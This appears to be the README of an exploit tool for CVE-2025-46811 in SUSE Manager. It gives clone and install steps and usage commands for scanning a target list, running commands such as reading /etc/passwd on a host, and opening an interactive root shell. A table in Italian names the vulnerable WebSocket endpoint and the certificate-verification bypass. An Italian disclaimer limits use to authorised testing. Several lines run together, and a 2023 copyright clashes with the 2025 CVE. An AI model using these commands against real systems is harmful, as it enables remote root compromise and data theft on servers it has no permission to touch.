
CVE-2025-46811
git clone https://github.com/yourusername/suse-manager-exploit.git
cd suse-manager-exploit
pip install -r requirements.txtpython3 exploit.py scan -i targets.txt -o vulnerable.txt --debug# Single command python3 exploit.py exploit 10.0.0.5 -c "cat /etc/passwd"Interactive shell
python3 exploit.py exploit vulnerable.com --debug
Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi. L'utilizzo contro sistemi senza previa autorizzazione è illegale.
MIT - Copyright (c) 2023
| Componente | Descrizione |
|---|---|
| Endpoint WebSocket | /rhn/websocket/minion/remote-commands |
| Controllo Vulnerabilità | Verifica l'esecuzione di comandi root tramite id |
| Gestione SSL | Bypassa la verifica del certificato |